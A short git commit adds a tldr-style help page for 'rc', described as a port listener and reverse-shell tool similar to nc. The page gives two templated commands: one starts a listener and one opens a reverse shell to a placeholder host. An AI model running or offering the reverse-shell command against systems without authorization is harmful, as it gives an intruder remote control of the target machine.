rc: add page (#6831)

This commit is contained in:
Joshua Shanks
2021-10-07 04:50:30 -07:00
committed by GitHub
parent d23184b464
commit e36515eb02

13
pages/common/rc.md Normal file
View File

@@ -0,0 +1,13 @@
# rc
> A modern simplistic port listener & reverse shell.
> Similar to `nc`.
> More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.
- Start listening on a specific port:
`rc -lp {{port}}`
- Start a reverse shell:
`rc {{host}} {{port}} -r {{shell}}`